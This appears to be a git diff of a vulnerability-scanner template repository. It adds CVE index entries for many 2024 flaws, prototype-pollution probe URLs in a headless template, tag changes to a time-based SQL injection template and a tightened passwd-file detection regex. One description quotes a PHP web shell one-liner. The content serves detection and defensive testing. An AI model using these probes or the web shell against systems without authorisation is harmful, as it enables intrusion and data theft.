{"ID":"CVE-2024-33113","Info":{"Name":"D-LINK DIR-845L bsc_sms_inbox.php file - Information Disclosure","Severity":"medium","Description":"D-LINK DIR-845L \u003c=v1.01KRb03 is vulnerable to Information disclosurey via bsc_sms_inbox.php.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-33113.yaml"}
@ -2551,6 +2564,7 @@
{"ID":"CVE-2024-36401","Info":{"Name":"GeoServer RCE in Evaluating Property Name Expressions","Severity":"critical","Description":"In the GeoServer version prior to 2.25.1, 2.24.3 and 2.23.5 of GeoServer, multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation due to unsafely evaluating property names as XPath expressions.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-36401.yaml"}
{"ID":"CVE-2024-36412","Info":{"Name":"SuiteCRM - SQL Injection","Severity":"critical","Description":"SuiteCRM is an open-source Customer Relationship Management (CRM) software application. Prior to versions 7.14.4 and 8.6.1, a vulnerability in events response entry point allows for a SQL injection attack. Versions 7.14.4 and 8.6.1 contain a fix for this issue.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-36412.yaml"}
{"ID":"CVE-2024-36527","Info":{"Name":"Puppeteer Renderer - Directory Traversal","Severity":"medium","Description":"puppeteer-renderer v.3.2.0 and before is vulnerable to Directory Traversal. Attackers can exploit the URL parameter using the file protocol to read sensitive information from the server.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-36527.yaml"}
{"ID":"CVE-2024-3656","Info":{"Name":"Keycloak \u003c 24.0.5 - Broken Access Control","Severity":"high","Description":"A flaw was found in Keycloak. Certain endpoints in Keycloak's admin REST API allow low-privilege users to access administrative functionalities. This flaw allows users to perform actions reserved for administrators, potentially leading to data breaches or system compromise.\n","Classification":{"CVSSScore":"8.1"}},"file_path":"http/cves/2024/CVE-2024-3656.yaml"}
{"ID":"CVE-2024-36683","Info":{"Name":"PrestaShop productsalert - SQL Injection","Severity":"critical","Description":"In the module 'Products Alert' (productsalert) up to version 1.7.4 from Smart Modules for PrestaShop, a guest can perform SQL injection in affected versions.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-36683.yaml"}
{"ID":"CVE-2024-3673","Info":{"Name":"Web Directory Free \u003c 1.7.3 - Local File Inclusion","Severity":"critical","Description":"The Web Directory Free WordPress plugin before 1.7.3 does not validate a parameter before using it in an include(), which could lead to Local File Inclusion issues.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2024/CVE-2024-3673.yaml"}
{"ID":"CVE-2024-36837","Info":{"Name":"CRMEB v.5.2.2 - SQL Injection","Severity":"high","Description":"SQL Injection vulnerability in CRMEB v.5.2.2 allows a remote attacker to obtain sensitive information via the getProductList function in the ProductController.php file.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-36837.yaml"}
@ -2573,6 +2587,7 @@
{"ID":"CVE-2024-38856","Info":{"Name":"Apache OFBiz - Remote Code Execution","Severity":"critical","Description":"Incorrect Authorization vulnerability in Apache OFBiz. This issue affects Apache OFBiz: through 18.12.14. Users are recommended to upgrade to version 18.12.15, which fixes the issue. Unauthenticated endpoints could allow execution of screen rendering code of screens if some preconditions are met (such as when the screen definitions don't explicitly check user's permissions because they rely on the configuration of their endpoints).\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-38856.yaml"}
{"ID":"CVE-2024-3922","Info":{"Name":"Dokan Pro \u003c= 3.10.3 - SQL Injection","Severity":"critical","Description":"The Dokan Pro plugin for WordPress is vulnerable to SQL Injection via the 'code' parameter in all versions up to, and including, 3.10.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-3922.yaml"}
{"ID":"CVE-2024-39250","Info":{"Name":"EfroTech Timetrax v8.3 - Sql Injection","Severity":"high","Description":"EfroTech Timetrax v8.3 was discovered to contain an unauthenticated SQL injection vulnerability via the q parameter in the search web interface.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-39250.yaml"}
{"ID":"CVE-2024-39713","Info":{"Name":"Rocket.Chat - Server-Side Request Forgery (SSRF)","Severity":"high","Description":"A Server-Side Request Forgery (SSRF) affects Rocket.Chat's Twilio webhook endpoint before version 6.10.1.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2024/CVE-2024-39713.yaml"}
{"ID":"CVE-2024-39903","Info":{"Name":"Solara \u003c1.35.1 - Local File Inclusion","Severity":"high","Description":"A Local File Inclusion (LFI) vulnerability was identified in widgetti/solara, in version \u003c1.35.1, which was fixed in version 1.35.1. This vulnerability arises from the application's failure to properly validate URI fragments for directory traversal sequences such as '../' when serving static files. An attacker can exploit this flaw by manipulating the fragment part of the URI to read arbitrary files on the local file system.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2024/CVE-2024-39903.yaml"}
{"ID":"CVE-2024-39907","Info":{"Name":"1Panel SQL Injection - Authenticated","Severity":"critical","Description":"1Panel is a web-based linux server management control panel. There are many sql injections in the project, and some of them are not well filtered, leading to arbitrary file writes, and ultimately leading to RCEs. These sql injections have been resolved in version 1.10.12-tls. Users are advised to upgrade. There are no known workarounds for these issues.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-39907.yaml"}
{"ID":"CVE-2024-39914","Info":{"Name":"FOG Project \u003c 1.5.10.34 - Remote Command Execution","Severity":"critical","Description":"FOG is a cloning/imaging/rescue suite/inventory management system. Prior to 1.5.10.34, packages/web/lib/fog/reportmaker.class.php in FOG was affected by a command injection via the filename parameter to /fog/management/export.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-39914.yaml"}
@ -2587,21 +2602,25 @@
{"ID":"CVE-2024-4257","Info":{"Name":"BlueNet Technology Clinical Browsing System 1.2.1 - Sql Injection","Severity":"medium","Description":"A vulnerability was found in BlueNet Technology Clinical Browsing System 1.2.1. It has been classified as critical. This affects an unknown part of the file /xds/deleteStudy.php. The manipulation of the argument documentUniqueId leads to sql injection. It is possible to initiate the attack remotely.\n","Classification":{"CVSSScore":"6.3"}},"file_path":"http/cves/2024/CVE-2024-4257.yaml"}
{"ID":"CVE-2024-4295","Info":{"Name":"Email Subscribers by Icegram Express \u003c= 5.7.20 - Unauthenticated SQL Injection via Hash","Severity":"critical","Description":"Email Subscribers by Icegram Express \u003c= 5.7.20 contains an unauthenticated SQL injection vulnerability via the hash parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-4295.yaml"}
{"ID":"CVE-2024-43160","Info":{"Name":"BerqWP \u003c= 1.7.6 - Arbitrary File Uplaod","Severity":"critical","Description":"The BerqWP Automated All-In-One PageSpeed Optimization Plugin for Core Web Vitals, Cache, CDN, Images, CSS, and JavaScript plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the /api/store_webp.php file in all versions up to, and including, 1.7.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-43160.yaml"}
{"ID":"CVE-2024-43360","Info":{"Name":"ZoneMinder - SQL Injection","Severity":"critical","Description":"ZoneMinder is a free, open source closed-circuit television software application. ZoneMinder is affected by a time-based SQL Injection vulnerability. This vulnerability is fixed in 1.36.34 and 1.37.61.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-43360.yaml"}
{"ID":"CVE-2024-43425","Info":{"Name":"Moodle - Remote Code Execution","Severity":"critical","Description":"Attackers with the permission to create or modify questions in Moodle courses are able to craft malicious inputs for calculated questions, which can be abused to execute arbitrary commands on the underlying system.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-43425.yaml"}
{"ID":"CVE-2024-4348","Info":{"Name":"osCommerce v4.0 - Cross-site Scripting","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in osCommerce 4. Affected is an unknown function of the file /catalog/all-products. The manipulation of the argument cat leads to cross site scripting. It is possible to launch the attack remotely.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2024/CVE-2024-4348.yaml"}
{"ID":"CVE-2024-4358","Info":{"Name":"Progress Telerik Report Server - Authentication Bypass","Severity":"critical","Description":"In Progress Telerik Report Server, version 2024 Q1 (10.0.24.305) or earlier, on IIS, an unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-4358.yaml"}
{"ID":"CVE-2024-43917","Info":{"Name":"WordPress TI WooCommerce Wishlist Plugin \u003c= 2.8.2 - SQL Injection","Severity":"critical","Description":"In the latest version (2.8.2 as of writing the article) and below, the plugin is vulnerable to a SQL injection vulnerability that allows any users to execute arbitrary SQL queries in the database of the WordPress site. No privileges are required to exploit the issue. The vulnerability is unpatched on the latest version and is tracked as the CVE-2024-43917.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-43917.yaml"}
{"ID":"CVE-2024-44000","Info":{"Name":"LiteSpeed Cache \u003c= 6.4.1 - Sensitive Information Exposure","Severity":"high","Description":"The LiteSpeed Cache plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 6.4.1 through the debug.log file that is publicly exposed. This makes it possible for unauthenticated attackers to view potentially sensitive information contained in the exposed log file. The log file may contain user cookies making it possible for an attacker to log in with any session that is actively valid and exposed in the log file. Note: the debug feature must be enabled for this to be a concern and this feature is disabled by default.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-44000.yaml"}
{"ID":"CVE-2024-4434","Info":{"Name":"LearnPress WordPress LMS Plugin \u003c= 4.2.6.5 - SQL Injection","Severity":"critical","Description":"The LearnPress WordPress LMS Plugin plugin for WordPress is vulnerable to time-based SQL Injection via the term_id parameter in versions up to, and including, 4.2.6.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-4434.yaml"}
{"ID":"CVE-2024-44349","Info":{"Name":"AnteeoWMS \u003c v4.7.34 - SQL Injection","Severity":"critical","Description":"A SQL injection vulnerability in login portal in AnteeoWMS before v4.7.34 allows unauthenticated attackers to execute arbitrary SQL commands via the username parameter and disclosure of some data in the underlying DB.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-44349.yaml"}
{"ID":"CVE-2024-4443","Info":{"Name":"Business Directory Plugin \u003c= 6.4.2 - SQL Injection","Severity":"critical","Description":"The Business Directory Plugin Easy Listing Directories for WordPress plugin for WordPress is vulnerable to time-based SQL Injection via the listingfields parameter in all versions up to, and including, 6.4.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-4443.yaml"}
{"ID":"CVE-2024-44849","Info":{"Name":"Qualitor \u003c= 8.24 - Remote Code Execution","Severity":"critical","Description":"Qualitor up to 8.24 is vulnerable to Remote Code Execution (RCE) via Arbitrary File Upload in checkAcesso.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-44849.yaml"}
{"ID":"CVE-2024-45195","Info":{"Name":"Apache OFBiz - Remote Code Execution","Severity":"high","Description":"Apache OFBiz below 18.12.16 is vulnerable to unauthenticated remote code execution on Linux and Windows. An attacker with no valid credentials can exploit missing view authorization checks in the web application to execute arbitrary code on the server\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-45195.yaml"}
{"ID":"CVE-2024-45241","Info":{"Name":"CentralSquare CryWolf - Path Traversal","Severity":"high","Description":"A traversal vulnerability in GeneralDocs.aspx in CentralSquare CryWolf (False Alarm Management) through 2024-08-09 allows unauthenticated attackers to read files outside of the working web directory via the rpt parameter, leading to the disclosure of sensitive information.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-45241.yaml"}
{"ID":"CVE-2024-45388","Info":{"Name":"Hoverfly \u003c 1.10.3 - Arbitrary File Read","Severity":"high","Description":"Hoverfly is a lightweight service virtualization/ API simulation / API mocking tool for developers and testers. The /api/v2/simulation POST handler allows users to create new simulation views from the contents of a user-specified file. This feature can be abused by an attacker to read arbitrary files from the Hoverfly server.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-45388.yaml"}
{"ID":"CVE-2024-45440","Info":{"Name":"Drupal 11.x-dev - Full Path Disclosure","Severity":"medium","Description":"core/authorize.php in Drupal 11.x-dev allows Full Path Disclosure (even when error logging is None) if the value of hash_salt is file_get_contents of a file that does not exist.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-45440.yaml"}
{"ID":"CVE-2024-45488","Info":{"Name":"SafeGuard for Privileged Passwords \u003c 7.5.2 - Authentication Bypass","Severity":"critical","Description":"One Identity Safeguard for Privileged Passwords before 7.5.2 allows unauthorized access because of an issue related to cookies. This only affects virtual appliance installations (VMware or HyperV). The fixed versions are 7.0.5.1 LTS, 7.4.2, and 7.5.2.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-45488.yaml"}
{"ID":"CVE-2024-45507","Info":{"Name":"Apache OFBiz - Remote Code Execution","Severity":"critical","Description":"Apache OFBiz below 18.12.16 is vulnerable to unauthenticated remote code execution on Linux and Windows. An attacker with no valid credentials can exploit missing view authorization checks in the web application to execute arbitrary code on the server\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-45507.yaml"}
{"ID":"CVE-2024-45622","Info":{"Name":"ASIS - SQL Injection Authentication Bypass","Severity":"critical","Description":"ASIS (aka Aplikasi Sistem Sekolah using CodeIgniter 3) 3.0.0 through 3.2.0 allows index.php username SQL injection for Authentication Bypass.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-45622.yaml"}
{"ID":"CVE-2024-4577","Info":{"Name":"PHP CGI - Argument Injection","Severity":"critical","Description":"PHP CGI - Argument Injection (CVE-2024-4577) is a critical argument injection flaw in PHP.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-4577.yaml"}
{"ID":"CVE-2024-46310","Info":{"Name":"FXServer \u003c v9601 - Information Exposure","Severity":"medium","Description":"Incorrect Access Control in FXServer version's v9601 and prior, for CFX.re FiveM, allows unauthenticated users to modify and read userdata via exposed api endpoint.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-46310.yaml"}
{"ID":"CVE-2024-46627","Info":{"Name":"DATAGERRY - REST API Auth Bypass","Severity":"critical","Description":"Incorrect access control in BECN DATAGERRY v2.2 allows attackers to execute arbitrary commands via crafted web requests.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2024/CVE-2024-46627.yaml"}
{"ID":"CVE-2024-46986","Info":{"Name":"Camaleon CMS \u003c 2.8.1 Arbitrary File Write to RCE","Severity":"critical","Description":"An arbitrary file write vulnerability accessible via the upload method of the MediaController allows authenticated users to write arbitrary files to any location on the web server Camaleon CMS is running on (depending on the permissions of the underlying filesystem). E.g. This can lead to a remote code execution in case an attacker is able to write a Ruby file into the config/initializers/ subfolder of the Ruby on Rails application\n","Classification":{"CVSSScore":"9.9"}},"file_path":"http/cves/2024/CVE-2024-46986.yaml"}
{"ID":"CVE-2024-47062","Info":{"Name":"Navidrome \u003c 0.53.0 - Authenticated SQL Injection","Severity":"critical","Description":"Navidrome is an open source web-based music collection server and streamer. Navidrome automatically adds parameters in the URL to SQL queries. This can be exploited to access information by adding parameters like `password=...` in the URL (ORM Leak). Furthermore, the names of the parameters are not properly escaped, leading to SQL Injections. Finally, the username is used in a `LIKE` statement, allowing people to log in with `%` instead of their username. When adding parameters to the URL, they are automatically included in an SQL `LIKE` statement (depending on the parameter's name). This allows attackers to potentially retrieve arbitrary information. For example, attackers can use the following request to test whether some encrypted passwords start with `AAA`. This results in an SQL query like `password LIKE 'AAA%'`, allowing attackers to slowly brute-force passwords. When adding parameters to the URL, they are automatically added to an SQL query. The names of the parameters are not properly escaped. This behavior can be used to inject arbitrary SQL code (SQL Injection). These vulnerabilities can be used to leak information and dump the contents of the database and have been addressed in release version 0.53.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-47062.yaml"}
@ -2621,6 +2640,7 @@
{"ID":"CVE-2024-5522","Info":{"Name":"WordPress HTML5 Video Player \u003c 2.5.27 - SQL Injection","Severity":"critical","Description":"The HTML5 Video Player WordPress plugin before 2.5.27 does not sanitize and escape a parameter from a REST route before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-5522.yaml"}
{"ID":"CVE-2024-5765","Info":{"Name":"WpStickyBar \u003c= 2.1.0 - SQL Injection","Severity":"high","Description":"The plugin does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-5765.yaml"}
{"ID":"CVE-2024-5827","Info":{"Name":"Vanna - SQL injection","Severity":"critical","Description":"Vanna v0.3.4 is vulnerable to SQL injection in its DuckDB integration exposed to its Flask Web APIs. Attackers can inject malicious SQL training data and generate corresponding queries to write arbitrary files on the victim's file system, such as backdoor.php with contents `\u003c?php system($_GET[0]); ?\u003e`. This can lead to command execution or the creation of backdoors.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-5827.yaml"}
{"ID":"CVE-2024-5910","Info":{"Name":"Palo Alto Expedition - Admin Account Takeover","Severity":"critical","Description":"Missing authentication for a critical function in Palo Alto Networks Expedition can lead to an Expedition admin account takeover for attackers with network access to Expedition.\n","Classification":{"CVSSScore":"9.3"}},"file_path":"http/cves/2024/CVE-2024-5910.yaml"}
{"ID":"CVE-2024-5932","Info":{"Name":"GiveWP - PHP Object Injection","Severity":"critical","Description":"The GiveWP Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.14.1 via deserialization of untrusted input from the 'give_title' parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-5932.yaml"}
{"ID":"CVE-2024-5936","Info":{"Name":"PrivateGPT \u003c 0.5.0 - Open Redirect","Severity":"medium","Description":"An open redirect vulnerability exists in imartinez/privategpt version 0.5.0 due to improper handling of the 'file' parameter. This vulnerability allows attackers to redirect users to a URL specified by user-controlled input without proper validation or sanitization.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2024/CVE-2024-5936.yaml"}
{"ID":"CVE-2024-5947","Info":{"Name":"Deep Sea Electronics DSE855 - Authentication Bypass","Severity":"medium","Description":"Deep Sea Electronics DSE855 Configuration Backup Missing Authentication Information Disclosure Vulnerability. This vulnerability allows network-adjacent attackers to disclose sensitive information on affected installations of Deep Sea Electronics DSE855 devices. Authentication is not required to exploit this vulnerability. The specific flaw exists within the web-based UI. The issue results from the lack of authentication prior to allowing access to functionality. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. Was ZDI-CAN-22679.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-5947.yaml"}
@ -2670,6 +2690,7 @@
{"ID":"CVE-2024-8503","Info":{"Name":"VICIdial - SQL Injection","Severity":"critical","Description":"An unauthenticated attacker can leverage a time-based SQL injection vulnerability in VICIdial to enumerate database records. By default, VICIdial stores plaintext credentials within the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-8503.yaml"}
{"ID":"CVE-2024-8517","Info":{"Name":"SPIP BigUp Plugin - Remote Code Execution","Severity":"critical","Description":"SPIP before 4.3.2, 4.2.16, and 4.1.18 is vulnerable to a command injection issue. A remote and unauthenticated attacker can execute arbitrary operating system commands by sending a crafted multipart file upload HTTP request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-8517.yaml"}
{"ID":"CVE-2024-8522","Info":{"Name":"LearnPress WordPress LMS - SQL Injection","Severity":"critical","Description":"The LearnPress WordPress LMS Plugin plugin for WordPress is vulnerable to SQL Injection via the 'c_only_fields' parameter of the /wp-json/learnpress/v1/courses REST API endpoint in all versions up to, and including, 4.2.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-8522.yaml"}
{"ID":"CVE-2024-8698","Info":{"Name":"Keycloak - SAML Core Package Signature Validation Flaw","Severity":"high","Description":"A flaw exists in the SAML signature validation method within the Keycloak XMLSignatureUtil class. The method incorrectly determines whether a SAML signature is for the full document or only for specific assertions based on the position of the signature in the XML document, rather than the Reference element used to specify the signed element. This flaw allows attackers to create crafted responses that can bypass the validation, potentially leading to privilege escalation or impersonation attacks.\n","Classification":{"CVSSScore":"7.7"}},"file_path":"http/cves/2024/CVE-2024-8698.yaml"}
{"ID":"CVE-2024-8752","Info":{"Name":"WebIQ 2.15.9 - Directory Traversal","Severity":"high","Description":"The Windows version of WebIQ 2.15.9 is affected by a directory traversal vulnerability that allows remote attackers to read any file on the system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-8752.yaml"}
{"ID":"CVE-2024-8877","Info":{"Name":"Riello Netman 204 - SQL Injection","Severity":"critical","Description":"The three endpoints /cgi-bin/db_datalog_w.cgi, /cgi-bin/db_eventlog_w.cgi, and /cgi-bin/db_multimetr_w.cgi are vulnerable to SQL injection without prior authentication. This enables an attacker to modify the collected log data in an arbitrary way.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-8877.yaml"}
{"ID":"CVE-2024-8883","Info":{"Name":"Keycloak - Open Redirect","Severity":"medium","Description":"A misconfiguration flaw was found in Keycloak. This issue can allow an attacker to redirect users to an arbitrary URL if a 'Valid Redirect URI' is set to http://localhost or http://127.0.0.1, enabling sensitive information such as authorization codes to be exposed to the attacker, potentially leading to session hijacking.\n","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2024/CVE-2024-8883.yaml"}

View File

@ -1 +1 @@
223d0a251042512ea9601274d93c16f4
927dc1164f3b6743928b787a83f64ae5

View File

@ -494,5 +494,4 @@ http:
- "SQ200: No table "
- "Virtuoso S0002 Error"
- "\\[(Virtuoso Driver|Virtuoso iODBC Driver)\\]\\[Virtuoso Server\\]"
# digest: 4b0a00483046022100966a70c7d7be953b8599b861fc338b7cd07ccdf1cbb93d789e504acd7e17088f022100c5479e75293b0b3f63f68b1f52124a544e68ac11490c58b0b8978a07cd882339:922c64590222798bb761d5b6d8e72950
# digest: 490a004630440220312a2619a0bef4a0328b000b96cf09ecf42226ee9b872709c7a0be7b7816f656022007e96f4d42fb5ee12201d386a057c06a4c1f3f38e4264a6c2459ba1766d3d0e4:922c64590222798bb761d5b6d8e72950

View File

@ -6,7 +6,7 @@ info:
severity: critical
description: |
This Template detects time-based Blind SQL Injection vulnerability
tags: sqli,dast,time-based,blind
tags: time-based-sqli,sqli,dast,blind
flow: http(1) && http(2)
@ -19,6 +19,7 @@ http:
- type: dsl
dsl:
- "duration<=7"
internal: true
- raw:
- |
@ -47,4 +48,4 @@ http:
- type: dsl
dsl:
- "duration>=7 && duration <=16"
# digest: 4a0a00473045022100d675885ab7a3077f93b0db61d16c0c497b081929390f70eaf3f83176718297bc0220757a070de885db66f2a5855ee6ae327d14d04b04f0ce5cfc27db288563341cfe:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502202529d892c477e15738b4e5537c797e61478cb79afff398f2dc90fca1769751960221009f10ae4d72053768a125dfa0aa2497b24e5150a453c8536c0cea34d4e5d4a5ae:922c64590222798bb761d5b6d8e72950

View File

@ -5,7 +5,8 @@ info:
author: pdteam
severity: medium
metadata:
max-request: 4
max-request: 8
verified: true
tags: headless
headless:
@ -17,7 +18,7 @@ headless:
- action: waitload
- action: script
name: extract
name: extract1
args:
code: |
() => {
@ -25,7 +26,7 @@ headless:
}
matchers:
- type: word
part: extract
part: extract1
words:
- "polluted"
@ -88,4 +89,85 @@ headless:
part: extract4
words:
- "polluted"
# digest: 490a0046304402203ff07b0c962c43a69dfc76af68fa56d67e2a9fd360759cc049f60b0881de88c402207dbfca6a94102f5a72926b28b0d10c3e80ad752625090dfb46f31c1774758f99:922c64590222798bb761d5b6d8e72950
- steps:
- args:
url: "{{BaseURL}}?__pro__proto__to__[vulnerableprop]=polluted"
action: navigate
- action: waitload
- action: script
name: extract5
args:
code: |
() => {
return window.vulnerableprop
}
matchers:
- type: word
part: extract5
words:
- "polluted"
- steps:
- args:
url: "{{BaseURL}}?__pro__proto__to__.vulnerableprop=polluted"
action: navigate
- action: waitload
- action: script
name: extract6
args:
code: |
() => {
return window.vulnerableprop
}
matchers:
- type: word
part: extract6
words:
- "polluted"
- steps:
- args:
url: "{{BaseURL}}?constconstructorructor[protoprototypetype][vulnerableprop]=polluted"
action: navigate
- action: waitload
- action: script
name: extract7
args:
code: |
() => {
return window.vulnerableprop
}
matchers:
- type: word
part: extract7
words:
- "polluted"
- steps:
- args:
url: "{{BaseURL}}?constconstructorructor.protoprototypetype.vulnerableprop=polluted"
action: navigate
- action: waitload
- action: script
name: extract8
args:
code: |
() => {
return window.vulnerableprop
}
matchers:
- type: word
part: extract8
words:
- "polluted"
# digest: 490a004630440220332d2eb43e6ee2b3b48ca3bd7b953693814ce81ca3c34fa2036bcbfc93482d6a02204efa7ecda7b863d46e7a42d80500a115097ba317b63547ed5c07a4124338dafc:922c64590222798bb761d5b6d8e72950

View File

@ -1 +1 @@
6.3.6.1
6.3.6.3

View File

@ -1 +1 @@
7.86
7.87

View File

@ -1 +1 @@
4.4.4
4.4.6

View File

@ -1 +1 @@
4.1.5
4.1.6

View File

@ -1 +1 @@
3.2.6
3.2.7

View File

@ -1 +1 @@
3.24.6
3.24.7

View File

@ -1 +1 @@
3.2.8
3.2.9

View File

@ -1 +1 @@
1.35.1
1.36.0

View File

@ -1 +1 @@
1.6.42
1.6.43

View File

@ -1 +1 @@
3.0.12
3.0.14

View File

@ -1 +1 @@
3.5.1
3.5.2

View File

@ -1 +1 @@
13.9
13.9.1

View File

@ -1 +1 @@
3.3.1
3.3.2

View File

@ -1 +1 @@
6.5.1
6.5.2

View File

@ -1 +1 @@
5.3.0
5.3.1

View File

@ -1 +1 @@
4.12
4.14

View File

@ -1 +1 @@
5.77
5.81

View File

@ -1 +1 @@
8.5.6
8.5.7

View File

@ -1 +1 @@
3.1.14
3.1.15

View File

@ -1 +1 @@
2.3.1
2.4.0

View File

@ -1 +1 @@
2.16.5
2.16.6

View File

@ -1 +1 @@
4.10.56
4.10.59

View File

@ -1 +1 @@
1.0.229
1.0.230

View File

@ -1 +1 @@
3.5.1.23
3.5.1.24

View File

@ -1 +1 @@
2.4.3
2.4.4

View File

@ -1 +1 @@
2.7.6
2.7.7

View File

@ -1 +1 @@
8.7.0
8.8.0

View File

@ -1 +1 @@
8.3.0
8.3.1

View File

@ -1 +1 @@
2.9.2
2.9.3

View File

@ -1 +1 @@
9.0.40
9.0.43

View File

@ -1 +1 @@
2.6.12
2.6.13

View File

@ -1 +1 @@
1.9.1.3
1.9.1.4

View File

@ -61,5 +61,5 @@ http:
- type: regex
regex:
- "root=.*:0:0"
# digest: 4a0a0047304502201b7a6938b4ba249a10fc7db131b554a3a5d026eea84f0c017f906046552a884c022100d7fc5da079a0e863422c5d15ac03bc2118e7a68415cc1181fa9d1b87ca1da794:922c64590222798bb761d5b6d8e72950
- "root:.*:0:0:"
# digest: 4b0a00483046022100b97dc7216d247bc3f2a24b3c5f7cc69ec237ac053ae91149c8c54229febc73ba022100a2c9b0d7bfdd0c58db33d911d5b00093258fd66f97aee175992679341128cb1b:922c64590222798bb761d5b6d8e72950

View File

@ -28,7 +28,7 @@ info:
vendor: web-dorado
product: spider_calendar
framework: wordpress
tags: cve2015,cve,wordpress,wp,sqli,wpscan,wp-plugin,spider-event-calendar,unauth,edb,web-dorado
tags: time-based-sqli,cve2015,cve,wordpress,wp,sqli,wpscan,wp-plugin,spider-event-calendar,unauth,edb,web-dorado
http:
- raw:
@ -44,4 +44,4 @@ http:
- 'status_code == 200'
- 'contains(body, "{\"status\":true,\"data\"")'
condition: and
# digest: 4a0a00473045022100daa723288b7ba31445615bf88d494dcea46bb73348e396a696dc4d3b653ff0a80220203c1979571b1052fe8581945a95d5755c8615d7b21138426b14f4a67c8867c2:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100d0d1de19b601f462ee58d28e0503bb93bcc23d3e3718449465cc90430ed0dde502205ce2cf1f373b2d5de5bb045a0506585f59b2f45bc8670208d0640382a01cabdc:922c64590222798bb761d5b6d8e72950

View File

@ -30,7 +30,7 @@ info:
vendor: newstatpress_project
product: newstatpress
framework: wordpress
tags: cve2015,cve,authenticated,sqli,wp-plugin,newstatpress,packetstorm,wordpress,wp,newstatpress_project
